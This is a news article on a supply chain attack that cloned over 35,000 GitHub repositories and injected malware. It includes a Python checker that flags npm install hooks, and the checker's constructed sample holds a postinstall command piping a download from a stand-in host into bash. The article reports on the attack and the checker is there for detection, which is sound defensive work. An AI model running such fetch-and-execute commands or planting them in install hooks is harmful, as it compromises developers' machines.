Github Supply Chain Attack Could Affect 83 Million Developers | Cyber Security Hub – Cyber Security Hub


GitHub, a code repository which is used by more than 83 million developers across the globe, has been the victim of a supply chain attack.
I am uncovering what seems to be a massive widespread malware attack on @GitHub.

– Currently over 35k repositories are infected
– So far found in projects including: crypto, golang, python, js, bash, docker, k8s
– It is added to npm scripts, docker images and install docs

The attack was discovered on the morning of 3 August by software developer Stephen Lacy. A bad actor had cloned more than 35,000 GitHub repositories and added malicious code to the clones while retaining the projects’ original source code. Almost 40 percent (13,000) of the affected repositories originated from a single organization, named “redhat-operator-ecosystem” on the site, a spoof of the Red Hat OpenShift ecosystem.
The cloned projects also tried to lure users into opening them by spoofing genuine user accounts, using names very similar to the original projects they were cloned from, and using legitimate-sounding organization names.
The malicious code collected information on the environment in which it was executed, for example identifying details about the device it ran on and the user who ran it, and had the potential to collect other sensitive data.
The code could also download additional malware from a third-party site, allowing the attacker to further exploit any application or environment that used the malicious cloned code originally introduced to the GitHub repositories.
The risk is that developers accidentally download a cloned repository containing the malicious code. If they use that code in their applications, they expose their own users to software that includes malware.
Lacy reported the attack to GitHub, which, according to Lacy, “cleaned up” the attack and stopped it spreading further by removing the affected projects and organizations.
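Lacy’s report notes that the injected code was added to npm scripts among other places. The following checker, added here as an illustration rather than anything from the original article or from GitHub, audits the lifecycle hooks in a package.json (the scripts npm runs automatically during install) for install-time download-and-execute or decode patterns; the sample package.json and the regex list are constructed for this example.

```python
import json
import re

# Lifecycle hooks that npm runs automatically during `npm install`; a malicious
# clone that injects a payload here runs it on every developer machine.
AUTO_RUN_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Patterns typical of install-time payloads. Constructed for this example;
# tune them to the tooling that is normal in your own projects.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b"), "pipes a download into a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "decodes a base64 blob at install time"),
    (re.compile(r"\beval\s*\("), "evaluates dynamically built code"),
]


def audit_package_json(text):
    """Return (hook, reason, script) findings for the package.json given as a string."""
    pkg = json.loads(text)
    findings = []
    for hook, script in pkg.get("scripts", {}).items():
        if hook not in AUTO_RUN_HOOKS:   # `build`, `test`, etc. only run on demand
            continue
        for pattern, reason in SUSPICIOUS:
            if pattern.search(script):
                findings.append((hook, reason, script))
    return findings


# Constructed sample: a clone whose postinstall hook fetches and runs a remote script.
MALICIOUS_SAMPLE = """{
  "name": "example-lib",
  "version": "1.0.0",
  "scripts": {
    "build": "tsc -p .",
    "postinstall": "curl -s https://example.invalid/x.sh | bash",
    "test": "jest"
  }
}"""

# Constructed sample: a benign project that only uses hooks for local setup.
CLEAN_SAMPLE = """{
  "name": "example-lib",
  "version": "1.0.0",
  "scripts": {"prepare": "husky install", "build": "tsc -p .", "test": "jest"}
}"""

if __name__ == "__main__":
    for hook, reason, script in audit_package_json(MALICIOUS_SAMPLE):
        print(f"[{hook}] {reason}: {script}")
```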
GitHub allows developers to store, track and control source code within the repository. It also allows for collaborative efforts between developers, meaning developers on GitHub are able to contribute to code deposited on the site by other members. Any changes, however, are controlled by the owner of the original code, who has full visibility on any changes made, and can choose to accept or reject any changes.
Members of the site can, and frequently do, download code stored on GitHub for use in their own projects or applications. Developers can also use GitHub’s clone function to make an exact copy of another developer’s code. This does not affect the original version of the code, and the developer who uploaded it retains its existing statistics (for example, views, contributions and follows). The cloned code has none of these statistics and essentially becomes new code. Developers often clone code when they wish to make significant changes to code created by another developer.
GitHub has provided advice for securing the code supply chain on its website. The advice contains three steps:
By securing their accounts, developers make it harder for bad actors to access their original source code. GitHub suggests doing the following:
By securing the code on the supply chain, developers can mitigate the risk that the code they are using to build their project is exposed to. GitHub advises that developers:
By securing the build system, developers can protect against attacks that target the system directly, rather than by exploiting vulnerable dependencies or gaining access to accounts. GitHub recommends safeguarding against these attacks by: